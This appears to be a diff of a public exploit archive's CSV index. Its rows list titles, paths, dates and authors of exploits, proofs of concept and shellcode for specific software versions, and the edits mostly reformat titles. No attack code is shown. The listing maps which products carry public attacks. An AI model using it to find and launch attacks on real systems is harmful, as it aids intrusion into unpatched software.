Vulnerbility",2011-01-07,n0n0x,php,webapps,0 15925,platforms/windows/dos/15925.txt,"StageTracker 2.5 - Denial of Service Vulnerability",2011-01-07,freak_out,windows,dos,0 15934,platforms/windows/local/15934.py,"BS.Player 2.57 Buffer Overflow Exploit (Unicode SEH)",2011-01-07,"C4SS!0 G0M3S",windows,local,0 @@ -13787,7 +13787,7 @@ id,file,description,date,author,platform,type,port 15943,platforms/php/webapps/15943.txt,"mingle forum (wordpress plugin) <= 1.0.26 - Multiple Vulnerabilities",2011-01-08,"Charles Hooper",php,webapps,0 15944,platforms/linux/local/15944.c,"Linux Kernel < 2.6.34 - CAP_SYS_ADMIN x86 & x64 Local Privilege Escalation Exploit (2)",2011-01-08,"Joe Sylve",linux,local,0 15945,platforms/php/webapps/15945.txt,"Zwii 2.1.1 - Remote File Inclusion Vulnerbility",2011-01-08,"Abdi Mohamed",php,webapps,0 -15946,platforms/windows/dos/15946.py,"IrfanView 4.28 Multiple Denial of Service Vulnerabilities",2011-01-09,BraniX,windows,dos,0 +15946,platforms/windows/dos/15946.py,"IrfanView 4.28 - Multiple Denial of Service Vulnerabilities",2011-01-09,BraniX,windows,dos,0 15957,platforms/windows/remote/15957.py,"KingView 6.5.3 SCADA HMI Heap Overflow PoC",2011-01-09,"Dillon Beresford",windows,remote,0 15958,platforms/php/webapps/15958.txt,"Joomla Captcha Plugin <= 4.5.1 - Local File Disclosure Vulnerability",2011-01-09,dun,php,webapps,0 15959,platforms/windows/dos/15959.pl,"Macro Express Pro 4.2.2.1 MXE File Syntactic Analysis Buffer Overflow PoC",2011-01-10,LiquidWorm,windows,dos,0 @@ -13801,7 +13801,7 @@ id,file,description,date,author,platform,type,port 15968,platforms/php/webapps/15968.txt,"vam shop 1.6 - Multiple Vulnerabilities",2011-01-11,"High-Tech Bridge SA",php,webapps,0 15969,platforms/php/webapps/15969.txt,"diafan.cms 4.3 - Multiple Vulnerabilities",2011-01-11,"High-Tech Bridge SA",php,webapps,0 15970,platforms/php/webapps/15970.txt,"Cambio 0.5a CSRF Vulnerabiliity",2011-01-11,"High-Tech Bridge SA",php,webapps,0 -15971,platforms/php/webapps/15971.txt,"whCMS 0.115 CSRF Vulnerability",2011-01-11,"High-Tech Bridge SA",php,webapps,0 +15971,platforms/php/webapps/15971.txt,"whCMS 0.115 - CSRF Vulnerability",2011-01-11,"High-Tech Bridge SA",php,webapps,0 15972,platforms/windows/local/15972.c,"DriveCrypt <= 5.3 - Local Kernel ring0 SYSTEM Exploit",2011-01-11,mu-b,windows,local,0 15973,platforms/multiple/dos/15973.txt,"Wireshark ZigBee ZCL Dissector Infinite Loop Denial of Service",2011-01-11,"Fred Fierling",multiple,dos,0 15974,platforms/linux/dos/15974.txt,"Mono/Moonlight Generic Type Argument Local Privilege Escalation",2011-01-11,"Chris Howie",linux,dos,0 @@ -13829,20 +13829,20 @@ id,file,description,date,author,platform,type,port 16003,platforms/php/webapps/16003.txt,"AWBS 2.9.2 (cart.php) Blind SQL Injection Vulnerability",2011-01-16,ShivX,php,webapps,0 16004,platforms/php/webapps/16004.txt,"PHP-Fusion Teams Structure Infusion Addon SQL Injection",2011-01-17,Saif,php,webapps,0 16006,platforms/cgi/webapps/16006.html,"SmoothWall Express 3.0 - Multiple Vulnerabilities",2011-01-17,"dave b",cgi,webapps,0 -16007,platforms/php/webapps/16007.txt,"AneCMS 1.3 Persistant XSS Vulnerability",2011-01-17,Penguin,php,webapps,0 +16007,platforms/php/webapps/16007.txt,"AneCMS 1.3 - Persistant XSS Vulnerability",2011-01-17,Penguin,php,webapps,0 16009,platforms/windows/local/16009.pl,"A-PDF All to MP3 Converter 2.0.0 (.wav) Buffer Overflow Exploit",2011-01-18,h1ch4m,windows,local,0 16010,platforms/php/webapps/16010.txt,"allCineVid Joomla Component 1.0.0 - Blind SQL Injection Vulnerability",2011-01-18,"Salvatore Fresta",php,webapps,0 16011,platforms/php/webapps/16011.txt,"CakePHP <= 1.3.5 / 1.2.8 unserialize() Vulnerability",2011-01-18,felix,php,webapps,0 -16012,platforms/windows/dos/16012.html,"Google Chrome 8.0.552.237 - address overflow DoS",2011-01-18,"Vuk Ivanovic",windows,dos,0 +16012,platforms/windows/dos/16012.html,"Google Chrome 8.0.552.237 - address Overflow DoS",2011-01-18,"Vuk Ivanovic",windows,dos,0 16013,platforms/php/webapps/16013.html,"N-13 News 3.4 - Remote Admin Add CSRF Exploit",2011-01-18,anT!-Tr0J4n,php,webapps,0 16014,platforms/windows/remote/16014.html,"Novell iPrint <= 5.52 ActiveX GetDriverSettings() Remote Exploit (ZDI-10-256)",2011-01-19,Dr_IDE,windows,remote,0 16016,platforms/php/webapps/16016.txt,"Simploo CMS 1.7.1 PHP Code Execution",2011-01-19,"David Vieira-Kurz",php,webapps,0 16018,platforms/php/webapps/16018.txt,"PHP auctions (viewfaqs.php) Blind SQL Injection Vulnerability",2011-01-19,"BorN To K!LL",php,webapps,0 16019,platforms/php/webapps/16019.txt,"Phpcms 2008 SQL Injection Vulnerability",2011-01-20,R3d-D3V!L,php,webapps,0 16020,platforms/php/webapps/16020.txt,"PHP Lowbids viewfaqs.php Blind SQL Injection Vulnerability",2011-01-20,"BorN To K!LL",php,webapps,0 -16021,platforms/windows/dos/16021.c,"Look n stop 0day Local Dos",2011-01-21,Heurs,windows,dos,0 -16022,platforms/windows/dos/16022.c,"Panda Global Protection 2010 local Dos",2011-01-21,Heurs,windows,dos,0 -16023,platforms/windows/dos/16023.c,"Panda Global Protection 2010 local Dos (unfiltered wcscpy())",2011-01-21,Heurs,windows,dos,0 +16021,platforms/windows/dos/16021.c,"Look n stop 0day Local DoS",2011-01-21,Heurs,windows,dos,0 +16022,platforms/windows/dos/16022.c,"Panda Global Protection 2010 local DoS",2011-01-21,Heurs,windows,dos,0 +16023,platforms/windows/dos/16023.c,"Panda Global Protection 2010 local DoS (unfiltered wcscpy())",2011-01-21,Heurs,windows,dos,0 16024,platforms/windows/local/16024.txt,"Microsoft Fax Cover Page Editor <= 5.2.3790.3959 Double Free Memory Corruption",2011-01-24,"Luigi Auriemma",windows,local,0 16025,platforms/bsd_x86/shellcode/16025.c,"BSD x86 connect back Shellcode (81 bytes)",2011-01-21,Tosh,bsd_x86,shellcode,0 16026,platforms/bsd_x86/shellcode/16026.c,"BSD x86 portbind + fork shellcode (111 bytes)",2011-01-21,Tosh,bsd_x86,shellcode,0 @@ -13868,7 +13868,7 @@ id,file,description,date,author,platform,type,port 16055,platforms/windows/remote/16055.txt,"Oracle Document Capture empop3.dll Insecure Methods",2011-01-26,"Evdokimov Dmitriy",windows,remote,0 16056,platforms/windows/remote/16056.txt,"Oracle Document Capture Insecure READ Method",2011-01-26,"Alexey Sintsov",windows,remote,0 16058,platforms/php/webapps/16058.txt,"MultiPowUpload 2.1 - Remote File Upload Vulnerability",2011-01-26,DIES3L,php,webapps,0 -16059,platforms/php/webapps/16059.txt,"Xnova Legacies 2009.2 CSRF Vulnerability",2011-01-26,"Xploit A Day",php,webapps,0 +16059,platforms/php/webapps/16059.txt,"Xnova Legacies 2009.2 - CSRF Vulnerability",2011-01-26,"Xploit A Day",php,webapps,0 16060,platforms/php/webapps/16060.txt,"comercioplus 5.6 - Multiple Vulnerabilities",2011-01-27,"Daniel Godoy",php,webapps,0 16061,platforms/php/webapps/16061.txt,"PHP Link Directory Software (sbcat_id) SQL Injection Vulnerability",2011-01-28,"BorN To K!LL",php,webapps,0 16062,platforms/php/webapps/16062.txt,"PHP Classified ads software (cid) Blind SQL Injection Vulnerability",2011-01-28,"BorN To K!LL",php,webapps,0 @@ -13898,14 +13898,14 @@ id,file,description,date,author,platform,type,port 16094,platforms/php/webapps/16094.txt,"Raja Natarajan Guestbook 1.0 - Local File Inclusion Vulnerability",2011-02-02,h0rd,php,webapps,0 16095,platforms/linux/dos/16095.pl,"Terminal Server Client .rdp Denial of Service",2011-02-02,"D3V!L FUCKER",linux,dos,0 16096,platforms/php/webapps/16096.txt,"redaxscript 0.3.2 - Multiple Vulnerabilities",2011-02-02,"High-Tech Bridge SA",php,webapps,0 -16097,platforms/php/webapps/16097.txt,"Zikula CMS <= 1.2.4 CSRF Vulnerability",2011-02-02,"Aung Khant",php,webapps,0 +16097,platforms/php/webapps/16097.txt,"Zikula CMS <= 1.2.4 - CSRF Vulnerability",2011-02-02,"Aung Khant",php,webapps,0 16098,platforms/android/local/16098.c,"Android 1.x/2.x HTC Wildfire - Local Root Exploit",2011-02-02,"The Android Exploid Crew",android,local,0 16099,platforms/android/local/16099.c,"Android 1.x/2.x - Local Root Exploit",2011-02-02,"The Android Exploid Crew",android,local,0 16100,platforms/hardware/remote/16100.txt,"Tandberg E, EX and C Series Endpoints Default Credentials for Root Account",2011-02-02,"Cisco Security",hardware,remote,0 16101,platforms/windows/remote/16101.py,"FTPGetter 3.58.0.21 - Buffer Overflow (PASV) Exploit",2011-02-03,modpr0be,windows,remote,0 16102,platforms/php/webapps/16102.txt,"Islam Sound IV2 - (details.php) Remote SQL Injection",2011-02-03,ZxH-Labs,php,webapps,0 16103,platforms/multiple/remote/16103.txt,"Majordomo2 - Directory Traversal (SMTP/HTTP)",2011-02-03,"Michael Brooks",multiple,remote,0 -16105,platforms/windows/remote/16105.txt,"quickshare file share 1.2.1 - Directory Traversal vulnerability",2011-02-03,modpr0be,windows,remote,0 +16105,platforms/windows/remote/16105.txt,"quickshare file share 1.2.1 - Directory Traversal Vulnerability",2011-02-03,modpr0be,windows,remote,0 16106,platforms/php/webapps/16106.txt,"OemPro 3.6.4 - Multiple Vulnerabilities",2011-02-03,"Ignacio Garrido",php,webapps,0 16107,platforms/windows/local/16107.py,"AOL Desktop 9.6 - (.rtx) Buffer Overflow",2011-02-03,sickness,windows,local,0 16108,platforms/multiple/dos/16108.txt,"VLC Media Player Subtitle StripTags() Function Memory Corruption",2011-02-03,"Harry Sintonen",multiple,dos,0 @@ -13928,17 +13928,17 @@ id,file,description,date,author,platform,type,port 16132,platforms/windows/local/16132.htm,"AoA DVD Creator 2.5 - ActiveX Stack Overflow Exploit",2011-02-07,"Carlos Mario Penagos Hollmann",windows,local,0 16133,platforms/windows/local/16133.htm,"AoA Mp4 converter 4.1.0 - ActiveX Stack Overflow Exploit",2011-02-07,"Carlos Mario Penagos Hollmann",windows,local,0 16134,platforms/php/webapps/16134.txt,"Model Agentur Script SQL Injection Vunerability",2011-02-08,NoNameMT,php,webapps,0 -16135,platforms/php/webapps/16135.html,"dotProject 2.1.5 CSRF Vulnerability",2011-02-08,"AutoSec Tools",php,webapps,0 -16136,platforms/php/webapps/16136.html,"AIOCP 1.4.001 CSRF Vulnerability",2011-02-08,"AutoSec Tools",php,webapps,0 +16135,platforms/php/webapps/16135.html,"dotProject 2.1.5 - CSRF Vulnerability",2011-02-08,"AutoSec Tools",php,webapps,0 +16136,platforms/php/webapps/16136.html,"AIOCP 1.4.001 - CSRF Vulnerability",2011-02-08,"AutoSec Tools",php,webapps,0 16137,platforms/multiple/remote/16137.c,"Multiple Vendor Calendar Manager Remote Code Execution",2011-02-09,"Rodrigo Rubira Branco",multiple,remote,0 16138,platforms/windows/local/16138.c,"DESlock+ <= 4.1.10 vdlptokn.sys Local Kernel ring0 SYSTEM Exploit",2011-02-09,mu-b,windows,local,0 -16139,platforms/php/webapps/16139.txt,"Auto Database System 1.0 Infusion Addon SQL injection Vulnerability",2011-02-09,Saif,php,webapps,0 +16139,platforms/php/webapps/16139.txt,"Auto Database System 1.0 Infusion Addon SQL Injection Vulnerability",2011-02-09,Saif,php,webapps,0 16140,platforms/php/webapps/16140.txt,"Web 2.0 Social Network Freunde Community SQL Injection Vunerability",2011-02-09,NoNameMT,php,webapps,0 16141,platforms/windows/local/16141.py,"xRadio 0.95b (.xrl) Local Buffer Overflow (SEH)",2011-02-09,b0telh0,windows,local,0 16143,platforms/php/webapps/16143.txt,"MihanTools Script 1.3.3 - SQL Injection Vulnerability",2011-02-09,WHITE_DEVIL,php,webapps,0 16144,platforms/php/webapps/16144.txt,"Enable Media Replace WordPress Plugin Multiple Vulnerabilities",2011-02-09,"Ulf Harnhammar",php,webapps,0 16145,platforms/windows/remote/16145.pl,"Unreal Tournament Remote Buffer Overflow Exploit (SEH)",2011-02-09,Fulcrum,windows,remote,0 -16148,platforms/php/webapps/16148.txt,"SourceBans 1.4.7 XSS Vulnerability",2011-02-09,Sw1tCh,php,webapps,0 +16148,platforms/php/webapps/16148.txt,"SourceBans 1.4.7 - XSS Vulnerability",2011-02-09,Sw1tCh,php,webapps,0 16149,platforms/hardware/remote/16149.txt,"Linksys WAP610N Unauthenticated Root Access Security Vulnerability",2011-02-10,"Matteo Ignaccolo",hardware,remote,0 16150,platforms/windows/dos/16150.py,"XM Easy Personal FTP Server 5.8.0 (TYPE) Denial of Service",2011-02-10,"Houssam Sahli",windows,dos,0 16152,platforms/multiple/webapps/16152.py,"LocatePC 1.05 (Ligatt Version + Others) - Trivial SQL Injection",2011-02-10,anonymous,multiple,webapps,0 @@ -13961,7 +13961,7 @@ id,file,description,date,author,platform,type,port 16172,platforms/php/webapps/16172.txt,"omegabill 1.0 build 6 - Multiple Vulnerabilities",2011-02-15,"AutoSec Tools",php,webapps,0 16173,platforms/windows/local/16173.py,"AutoPlay 1.33 (autoplay.ini) - Local Buffer Overflow Exploit (SEH)",2011-02-15,badc0re,windows,local,0 16175,platforms/php/webapps/16175.txt,"Seo Panel 2.2.0 - SQL Injection Vulnerabilities",2011-02-15,"High-Tech Bridge SA",php,webapps,0 -16176,platforms/windows/remote/16176.pl,"ActFax Server (LPD/LPR) 4.25, Build 0221 (2010-02-11) - Remote Buffer Overflow Exploit",2011-02-16,chap0,windows,remote,0 +16176,platforms/windows/remote/16176.pl,"ActFax Server (LPD/LPR) 4.25, Build 0221 (2010-02-11) - Remote Buffer Overflow Exploit",2011-02-16,chap0,windows,remote,0 16177,platforms/windows/remote/16177.py,"ActFax Server FTP 4.25, Build 0221 (2010-02-11) - Remote BOF (Post Auth)",2011-02-16,chap0,windows,remote,0 16178,platforms/asp/webapps/16178.txt,"Rae Media Real Estate Single Agent SQL Injection Vulnerability",2011-02-16,R4dc0re,asp,webapps,0 16179,platforms/asp/webapps/16179.txt,"Rae Media Real Estate Multi Agent SQL Injection Vulnerability",2011-02-16,R4dc0re,asp,webapps,0 @@ -14042,9 +14042,9 @@ id,file,description,date,author,platform,type,port 16270,platforms/linux/dos/16270.c,"vsftpd 2.3.2 - Denial of Service Vulnerability",2011-03-02,"Maksymilian Arciemowicz",linux,dos,0 16271,platforms/ios/remote/16271.txt,"iOS TIOD 1.3.3 - Directory Traversal",2011-03-03,"R3d@l3rt, H@ckk3y",ios,remote,0 16272,platforms/php/webapps/16272.txt,"Limelight Software (article.php) SQL Injection Vulnerability",2011-03-04,eXeSoul,php,webapps,0 -16273,platforms/php/webapps/16273.php,"PHP Speedy <= 0.5.2 Wordpress Plugin (admin_container.php) Remote Code Exec Exploit",2011-03-04,mr_me,php,webapps,0 +16273,platforms/php/webapps/16273.php,"PHP Speedy <= 0.5.2 Wordpress Plugin - (admin_container.php) Remote Code Execution Exploit",2011-03-04,mr_me,php,webapps,0 16274,platforms/jsp/webapps/16274.pl,"JBoss Application Server Remote Exploit",2011-03-04,kingcope,jsp,webapps,0 -16275,platforms/hardware/remote/16275.txt,"Comtrend ADSL Router CT-5367 C01_R12 Remote Root",2011-03-04,"Todor Donev",hardware,remote,0 +16275,platforms/hardware/remote/16275.txt,"Comtrend ADSL Router CT-5367 C01_R12 - Remote Root",2011-03-04,"Todor Donev",hardware,remote,0 16276,platforms/php/webapps/16276.txt,"ADAN Neuronlabs (view.php) SQL Injection Vulnerability",2011-03-04,IRAQ_JAGUAR,php,webapps,0 16278,platforms/ios/remote/16278.py,"iOS iFileExplorer Free - Directory Traversal",2011-03-04,theSmallNothin,ios,remote,0 16279,platforms/php/webapps/16279.txt,"MySms 1.0 - Multiple Vulnerabilities",2011-03-05,"AtT4CKxT3rR0r1ST ",php,webapps,0 @@ -14063,7 +14063,7 @@ id,file,description,date,author,platform,type,port 16293,platforms/multiple/remote/16293.rb,"Sun Java Calendar Deserialization Exploit",2010-09-20,metasploit,multiple,remote,0 16294,platforms/multiple/remote/16294.rb,"Sun Java JRE getSoundbank file:// URI Buffer Overflow",2010-09-20,metasploit,multiple,remote,0 16295,platforms/multiple/remote/16295.rb,"Apple QTJava toQTPointer() Arbitrary Memory Access",2010-09-20,metasploit,multiple,remote,0 -16296,platforms/osx/remote/16296.rb,"Apple OS X iTunes 8.1.1 ITMS Overflow",2010-11-11,metasploit,osx,remote,0 +16296,platforms/osx/remote/16296.rb,"Apple OS X iTunes 8.1.1 ITms Overflow",2010-11-11,metasploit,osx,remote,0 16297,platforms/multiple/remote/16297.rb,"Java Statement.invoke() Trusted Method Chain Exploit",2010-12-15,metasploit,multiple,remote,0 16298,platforms/multiple/remote/16298.rb,"Sun Java JRE AWT setDiffICM Buffer Overflow",2010-09-20,metasploit,multiple,remote,0 16299,platforms/multiple/remote/16299.rb,"Firefox 3.5 escape() Return Value Memory Corruption",2010-09-20,metasploit,multiple,remote,0 @@ -14151,7 +14151,7 @@ id,file,description,date,author,platform,type,port 16381,platforms/windows/remote/16381.rb,"MOXA Device Manager Tool 2.1 - Buffer Overflow",2010-11-14,metasploit,windows,remote,0 16382,platforms/windows/remote/16382.rb,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_INITIALIZE Buffer Overflow",2010-11-30,metasploit,windows,remote,0 16383,platforms/windows/remote/16383.rb,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_INITIALIZE_RF Buffer Overflow",2010-11-30,metasploit,windows,remote,0 -16384,platforms/windows/remote/16384.rb,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_TXTEVENT Buffer Overflow",2010-11-24,metasploit,windows,remote,0 +16384,platforms/windows/remote/16384.rb,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_TXTEVENT Buffer Overflow",2010-11-24,metasploit,windows,remote,0 16385,platforms/windows/remote/16385.rb,"DATAC RealWin SCADA Server Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16386,platforms/windows/remote/16386.rb,"D-Link DWL-G132 Wireless Driver Beacon Rates Overflow",2010-07-03,metasploit,windows,remote,0 16387,platforms/hardware/remote/16387.rb,"Broadcom Wireless Driver Probe Response SSID Overflow",2010-07-03,metasploit,hardware,remote,0 @@ -14534,7 +14534,7 @@ id,file,description,date,author,platform,type,port 16764,platforms/windows/remote/16764.rb,"IBM Tivoli Storage Manager Express CAD Service Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16765,platforms/windows/remote/16765.rb,"MaxDB WebDBM Database Parameter Overflow",2010-09-20,metasploit,windows,remote,9999 16766,platforms/windows/remote/16766.rb,"Sybase EAServer 5.2 - Remote Stack Buffer Overflow",2010-06-22,metasploit,windows,remote,8080 -16767,platforms/windows/remote/16767.rb,"IA WebMail 3.x Buffer Overflow",2010-05-09,metasploit,windows,remote,80 +16767,platforms/windows/remote/16767.rb,"IA WebMail 3.x - Buffer Overflow",2010-05-09,metasploit,windows,remote,80 16768,platforms/windows/remote/16768.rb,"Trend Micro OfficeScan Remote Stack Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16769,platforms/windows/remote/16769.rb,"eDirectory 8.7.3 iMonitor Remote Stack Buffer Overflow",2010-07-13,metasploit,windows,remote,8008 16770,platforms/windows/shellcode/16770.rb,"Savant 3.1 Web Server Overflow",2010-10-04,metasploit,windows,shellcode,0 @@ -14546,7 +14546,7 @@ id,file,description,date,author,platform,type,port 16776,platforms/windows/remote/16776.rb,"Alt-N WebAdmin USER Buffer Overflow",2010-02-15,metasploit,windows,remote,0 16777,platforms/windows/remote/16777.rb,"Free Download Manager Remote Control Server Buffer Overflow",2010-07-13,metasploit,windows,remote,80 16778,platforms/windows/remote/16778.rb,"Race River Integard Home/Pro LoginAdmin Password Stack Buffer Overflow",2010-12-15,metasploit,windows,remote,18881 -16779,platforms/windows/remote/16779.rb,"Now SMS/MMS Gateway Buffer Overflow",2010-05-09,metasploit,windows,remote,8800 +16779,platforms/windows/remote/16779.rb,"Now SMS/Mms Gateway Buffer Overflow",2010-05-09,metasploit,windows,remote,8800 16780,platforms/cgi/webapps/16780.rb,"HP OpenView Network Node Manager Snmp.exe CGI Buffer Overflow",2010-11-11,metasploit,cgi,webapps,0 16781,platforms/windows/remote/16781.rb,"MailEnable Authorization Header Buffer Overflow",2010-07-07,metasploit,windows,remote,0 16782,platforms/windows/remote/16782.rb,"Apache Win32 Chunked Encoding",2010-07-07,metasploit,windows,remote,0 @@ -14695,7 +14695,7 @@ id,file,description,date,author,platform,type,port 16928,platforms/linux/remote/16928.rb,"System V Derived /bin/login Extraneous Arguments Buffer Overflow",2010-07-03,metasploit,linux,remote,0 16929,platforms/aix/dos/16929.rb,"AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow",2010-11-11,metasploit,aix,dos,0 16930,platforms/aix/remote/16930.rb,"ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)",2010-11-11,metasploit,aix,remote,0 -16931,platforms/php/webapps/16931.html,"N-13 News 4.0 CSRF Vulnerability (Add Admin)",2011-03-06,"AtT4CKxT3rR0r1ST ",php,webapps,0 +16931,platforms/php/webapps/16931.html,"N-13 News 4.0 - CSRF Vulnerability (Add Admin)",2011-03-06,"AtT4CKxT3rR0r1ST ",php,webapps,0 16933,platforms/php/webapps/16933.txt,"Quick Polls Local File Inclusion and Deletion Vulnerabilities",2011-03-06,"Mark Stanislav",php,webapps,0 16934,platforms/php/webapps/16934.pl,"EggAvatar for vBulletin 3.8.x SQL Injection Vulnerability",2011-03-06,DSecurity,php,webapps,0 16935,platforms/php/webapps/16935.txt,"bacula-web 1.3.x - 5.0.3 - Multiple Vulnerabilities",2011-03-07,b0telh0,php,webapps,0 @@ -14703,7 +14703,7 @@ id,file,description,date,author,platform,type,port 16937,platforms/php/webapps/16937.pl,"EggAvatar 2.3.2 for vBulletin 3.8.x Local File Read",2011-03-07,DSecurity,php,webapps,0 16938,platforms/php/webapps/16938.txt,"BMForum Myna 6.0 - SQL Injection Vulnerability",2011-03-07,"Stephan Sattler",php,webapps,0 16939,platforms/multiple/dos/16939.txt,"Hiawatha WebServer 7.4 - Denial of Service Vulnerability",2011-03-07,"Rodrigo Escobar",multiple,dos,0 -16940,platforms/windows/local/16940.c,".NET Runtime Optimization Service Privilege Escalation Exploit 0day",2011-03-08,XenoMuta,windows,local,0 +16940,platforms/windows/local/16940.c,".NET Runtime Optimization Service - Privilege Escalation Exploit (0day)",2011-03-08,XenoMuta,windows,local,0 16941,platforms/asp/webapps/16941.txt,"EzPub Simple Classic ASP CMS SQL Injection Vulnerability",2011-03-08,p0pc0rn,asp,webapps,0 16942,platforms/windows/local/16942.pl,"Movavi VideoSuite 8.0 MediaPlayer m3u Buffer Overflow",2011-03-08,KedAns-Dz,windows,local,0 16943,platforms/windows/dos/16943.pl,"Movavi VideoSuite 8.0 SlideShow jpg Local Crash PoC",2011-03-08,KedAns-Dz,windows,dos,0 @@ -14747,7 +14747,7 @@ id,file,description,date,author,platform,type,port 16985,platforms/multiple/remote/16985.rb,"Adobe ColdFusion - Directory Traversal",2011-03-16,metasploit,multiple,remote,0 16986,platforms/windows/dos/16986.py,"AVIPreview 0.26 Alpha Denial of Service",2011-03-16,BraniX,windows,dos,0 16987,platforms/php/webapps/16987.txt,"pointter php content management system 1.2 - Multiple Vulnerabilities",2011-03-16,LiquidWorm,php,webapps,0 -16988,platforms/php/webapps/16988.txt,"WikiWig 5.01 Multiple XSS Vulnerabilities",2011-03-16,"AutoSec Tools",php,webapps,0 +16988,platforms/php/webapps/16988.txt,"WikiWig 5.01 - Multiple XSS Vulnerabilities",2011-03-16,"AutoSec Tools",php,webapps,0 16989,platforms/php/webapps/16989.txt,"b2evolution 4.0.3 Persistent XSS Vulnerability",2011-03-16,"AutoSec Tools",php,webapps,0 16990,platforms/multiple/remote/16990.rb,"Sun Java Applet2ClassLoader - Remote Code Execution Exploit",2011-03-16,metasploit,multiple,remote,0 16991,platforms/windows/local/16991.txt,"Microsoft Source Code Analyzer for SQL Injection 1.3 Improper Permissions",2011-03-17,LiquidWorm,windows,local,0 @@ -14763,7 +14763,7 @@ id,file,description,date,author,platform,type,port 17002,platforms/php/webapps/17002.txt,"CMS Loko Media Local File Download Vulnerability",2011-03-18,Xr0b0t,php,webapps,0 17003,platforms/php/webapps/17003.py,"iCMS 1.1 - Admin SQLi/Bruteforce Exploit",2011-03-18,TecR0c,php,webapps,0 17004,platforms/linux/dos/17004.txt,"libzip 0.9.3 _zip_name_locate NULL Pointer Dereference (incl PHP 5.3.5)",2011-03-18,"Maksymilian Arciemowicz",linux,dos,0 -17005,platforms/php/webapps/17005.txt,"Kleophatra 0.1.4 0day Arbitrary Upload File Vulnerability",2011-03-19,Xr0b0t,php,webapps,0 +17005,platforms/php/webapps/17005.txt,"Kleophatra 0.1.4 - Arbitrary Upload File Vulnerability (0day)",2011-03-19,Xr0b0t,php,webapps,0 17006,platforms/php/webapps/17006.txt,"balitbang cms 3.3 - Multiple Vulnerabilities",2011-03-19,Xr0b0t,php,webapps,0 17007,platforms/php/webapps/17007.txt,"Phpbuddies - Arbitrary Upload File Vulnerability",2011-03-19,Xr0b0t,php,webapps,0 17009,platforms/php/webapps/17009.txt,"CMS Balitbang 3.3 Arbitary File Upload Vulnerability",2011-03-19,eidelweiss,php,webapps,0 @@ -14786,7 +14786,7 @@ id,file,description,date,author,platform,type,port 17028,platforms/windows/remote/17028.rb,"HP OpenView NNM nnmRptConfig nameParams Buffer Overflow",2011-03-23,metasploit,windows,remote,0 17029,platforms/windows/remote/17029.rb,"HP NNM CGI webappmon.exe OvJavaLocale Buffer Overflow",2011-03-23,metasploit,windows,remote,0 17030,platforms/windows/remote/17030.rb,"HP NNM CGI webappmon.exe execvp Buffer Overflow",2011-03-23,metasploit,windows,remote,0 -17031,platforms/linux/remote/17031.rb,"Distributed Ruby send syscall vulnerability",2011-03-23,metasploit,linux,remote,0 +17031,platforms/linux/remote/17031.rb,"Distributed Ruby send syscall Vulnerability",2011-03-23,metasploit,linux,remote,0 17032,platforms/windows/dos/17032.txt,"VMCPlayer 1.0 - Denial of Service",2011-03-23,BraniX,windows,dos,0 17033,platforms/windows/dos/17033.py,"IGSS 8 ODBC Server Multiple Remote Uninitialized Pointer Free DoS",2011-03-23,"Jeremy Brown",windows,dos,0 17034,platforms/windows/remote/17034.py,"Progea Movicon 11 TCPUploadServer Remote Exploit",2011-03-23,"Jeremy Brown",windows,remote,0 @@ -14833,8 +14833,8 @@ id,file,description,date,author,platform,type,port 17084,platforms/php/webapps/17084.txt,"Andy's PHP Knowledgebase 0.95.2 (viewusers.php) SQL Injection",2011-03-30,"Mark Stanislav",php,webapps,0 17085,platforms/php/webapps/17085.txt,"PHPBoost 3.0 - Remote Download Backup Vulnerability",2011-03-31,KedAns-Dz,php,webapps,0 17086,platforms/windows/local/17086.pl,"Word List Builder Buffer Overflow Exploit (SEH)",2011-04-01,h1ch4m,windows,local,0 -17087,platforms/windows/dos/17087.pl,"Real player 14.0.2.633 - 0day Buffer overflow/DOS Exploit",2011-04-01,^Xecuti0N3r,windows,dos,0 -17089,platforms/windows/dos/17089.pl,"GOM Media Player 2.1.6.3499 - 0Day Buffer overflow/DOS Exploit",2011-04-01,^Xecuti0N3r,windows,dos,0 +17087,platforms/windows/dos/17087.pl,"Real player 14.0.2.633 - Buffer overflow/DOS Exploit (0day)",2011-04-01,^Xecuti0N3r,windows,dos,0 +17089,platforms/windows/dos/17089.pl,"GOM Media Player 2.1.6.3499 - Buffer overflow/DOS Exploit (0day)",2011-04-01,^Xecuti0N3r,windows,dos,0 17091,platforms/php/webapps/17091.html,"Allomani E-Store 1.0 - CSRF Vulnerability (Add Admin)",2011-04-01,"AtT4CKxT3rR0r1ST ",php,webapps,0 17092,platforms/php/webapps/17092.html,"Allomani News 1.0 - CSRF Vulnerability (Add Admin)",2011-04-01,"AtT4CKxT3rR0r1ST ",php,webapps,0 17093,platforms/php/webapps/17093.html,"Allomani Movies Library 2.0 - CSRF Vulnerability (Add Admin)",2011-04-01,"AtT4CKxT3rR0r1ST ",php,webapps,0 @@ -14842,8 +14842,8 @@ id,file,description,date,author,platform,type,port 17095,platforms/php/webapps/17095.html,"Allomani Audio and Video Library 2.7.0 - CSRF Vulnerability (Add Admin)",2011-04-01,"AtT4CKxT3rR0r1ST ",php,webapps,0 17096,platforms/php/webapps/17096.html,"Allomani Super Multimedia Library 2.5.0 - CSRF Vulnerability (Add Admin)",2011-04-01,"AtT4CKxT3rR0r1ST ",php,webapps,0 17097,platforms/bsd/dos/17097.c,"IPComp encapsulation pre-auth kernel memory corruption",2011-04-01,"Tavis Ormandy",bsd,dos,0 -17098,platforms/php/webapps/17098.txt,"InTerra Blog Machine 1.84 XSS Vulnerability",2011-04-01,"High-Tech Bridge SA",php,webapps,0 -17099,platforms/php/webapps/17099.txt,"Feng Office 1.7.3.3 CSRF Vulnerability",2011-04-01,"High-Tech Bridge SA",php,webapps,0 +17098,platforms/php/webapps/17098.txt,"InTerra Blog Machine 1.84 - XSS Vulnerability",2011-04-01,"High-Tech Bridge SA",php,webapps,0 +17099,platforms/php/webapps/17099.txt,"Feng Office 1.7.3.3 - CSRF Vulnerability",2011-04-01,"High-Tech Bridge SA",php,webapps,0 17100,platforms/php/webapps/17100.txt,"spidaNews 1.0 news.php (id) SQL Injection Vulnerability news.php (id)",2011-04-02,"Easy Laster",php,webapps,0 